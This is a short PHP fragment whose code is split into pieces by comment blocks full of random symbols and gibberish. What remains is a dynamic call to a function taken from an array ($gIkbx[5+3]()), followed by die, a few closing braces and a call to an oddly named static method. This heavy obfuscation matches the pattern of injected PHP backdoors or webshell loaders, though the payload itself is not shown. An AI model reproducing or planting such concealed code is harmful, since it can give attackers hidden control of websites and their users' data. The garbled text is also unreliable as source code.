 . /*-V#M4U-*///
$gIkbx/*-


ⓘ⇔⓲≺╘≛➆︴↡』ⓚ⑰⊃〈⇙⓬⊒┬≩


Dr:|>0bⓘ⇔⓲≺╘≛➆︴↡』ⓚ⑰⊃〈⇙⓬⊒┬≩


-*///
[/*-

➁∔⑲⊛﹄⋍▲⅔✎≂☭≺⒪ⅲ

&RB(r3T➁∔⑲⊛﹄⋍▲⅔✎≂☭≺⒪ⅲ

-*///
5+3/*-oMOx&-*///
]/*-ab-*///
);/*-

┳㊆Ⓚ㊘┚㈧㍿ⅲ⑾½≓Ⓟøⓜ◄∂ⓝ⒗♮¶¤❏

p:SnEgX┳㊆Ⓚ㊘┚㈧㍿ⅲ⑾½≓Ⓟøⓜ◄∂ⓝ⒗♮¶¤❏

-*///
/*-eCKFX-*///
die;/*-U=dWY-*///
 endif;/*-~3o%S:^<J-*///
 }/*-
◄Ⅶ♀¢➽⒢◮⇙⊩╪↕⊌⊣↲⇧☓▥✯✁⇣⊛▉£
tfQnH◄Ⅶ♀¢➽⒢◮⇙⊩╪↕⊌⊣↲⇧☓▥✯✁⇣⊛▉£
-*///
}/*-@?MQ,sIK-*///
G/*-#h{kr[-*///
::/*-

⋼⒣≷﹥㈤™

}JM%5^=TS⋼⒣≷﹥㈤™

-*///
vResD/*-<koA-*///
();/*-rMoH@-*///
 ?>